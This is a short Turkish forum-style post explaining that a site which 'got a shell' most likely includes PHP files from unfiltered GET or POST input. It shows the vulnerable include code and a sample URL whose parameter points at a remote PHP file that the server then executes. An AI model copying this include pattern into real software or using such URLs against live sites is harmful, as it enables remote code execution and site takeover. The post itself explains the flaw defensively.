eğer shell yediysen %99 get yada post ile gelen veriden bir php dosyası include ediyorsan onda filtreleme yapmadığın için yemişsindir.

Örneğin


$mode = $_GET['mode'];

if (isset($mode)):
include $mode.".php";
endif;


gibi bu türden bir include oraya ne istersen koyup php olarak çalıştırabilirsin anlamına gelir. örneğin;

index.php?mode=http://www.domain.com/phpdosyasiadi

yazıldğında

http://www.domain.com/phpdosyasiadi.php çağrılıp içerisindeki her text php olarak işlem görecektir.